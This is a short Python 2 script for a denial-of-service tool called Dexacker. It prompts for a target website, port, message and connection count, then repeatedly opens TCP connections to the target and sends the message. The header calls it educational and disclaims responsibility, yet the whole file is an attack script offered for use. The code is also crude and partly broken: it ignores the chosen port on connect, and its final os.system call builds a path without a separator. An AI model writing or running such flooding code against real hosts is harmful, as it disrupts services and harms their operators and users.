#!/usr/bin/env python #______________________________________# #Dexacker is an open source tool developed by Abdelmadjd Cherfaoui #Dexacker is designed for Educational Stuff to do a LEGAL DDOS Test and the developers is # not responsible for ILLEGAL USES #Contacting using:@Hexacker | fb.com/Hexacker #http://www.hackercademy.com #http://www.bringitsimple.com #______________________________________# #Importing Modules import socket,os,sys,string #Lunching Tool print "Lunching Dexacker..." print "Remember that Dexacker is an Educational Tool\nand you are responsible for any ILLEGAL USES\nThe Developer is not responsible for your behaviors " #Default Settings host = raw_input("Enter the website link you want to DDOS it: ") port = int(raw_input("Enter the port you want to Attack: ")) message = raw_input("Write the message you want to send it: ") connections = int(raw_input("How many beat you want to make: " )) IP = socket.gethostbyname(host) #/ #The Attacking Function def Attack(): attack = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: attack.connect((host,80)) attack.send(message) attack.sendto(message, (IP,port)) attack.send(message); except socket.error,msg: print "Connection Failed" print "DDOS Attack Lunched" attack.close() for i in range(1,connections): Attack() print "______________________________________" print "The Operation is finished" #this is the restaring function def Restart(): program = sys.executable os.execl(program,program,* sys.argv) CurDirectory = os.getcwd() if __name__ == "__main__": request = raw_input("Do you start over? Y or N :") if request.strip() in "y Y yes Yes YES YEs yES".split(): Restart() else: os.system(CurDirectory+"Dexacker.py")